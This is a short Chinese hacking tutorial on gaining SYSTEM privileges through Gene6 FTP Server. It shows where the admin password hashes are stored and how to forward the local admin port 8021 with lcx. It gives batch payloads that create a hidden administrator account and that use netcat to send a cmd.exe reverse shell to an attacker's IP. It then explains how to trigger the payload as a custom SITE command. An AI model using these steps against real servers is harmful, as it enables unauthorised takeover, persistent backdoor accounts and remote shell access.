GeneFTP Server提权小记

Gene6 FTP Server\RemoteAdmin\Remote.ini

密码在这边可以看到 以MD5形式加密的。

默认8021管理端口不允许外链,端口转发今天试了一整天就是没成功,一连接就断开。

最后想到一个思路,就是从防火墙下手。

运行这个:

netsh firewall show service

找入站缺空端口 转发8021过去 Htran lcx神马的都行 (lcx -tran xxx 127.0.0.1 8021)

写一个能执行命令的批处理文件,并上传到目标主机.

@echo off
net user haihai$ haihai /add
net localgroup administrators haihai$ /add

==============或是这个(直接弹system权限的shell回来)==============

@echo off
D:/RECYCLER/nc.exe -e cmd.exe xxx.xxx.xxx.xxx 12666

然后在SITE COMMANDS那个地方再进行配置.

COMMAND那输入你的命令执行的名字.我写的是EXEC

DESCRIPTTION这个是写描述的.这里随便写什么都可以的.
EXECUTE这里输入你的BAT的命令执行文件的路径.也就是你刚上传的那个文件的路径.点OK就可以了.

现在我们登陆FTP进行提权操作.

输入命令 “quote site EXEC”
//这边要用cmd去登入 才能顺利执行 filezilla神马的运行总是报错命令不存在

200 Command executed 命令成功执行.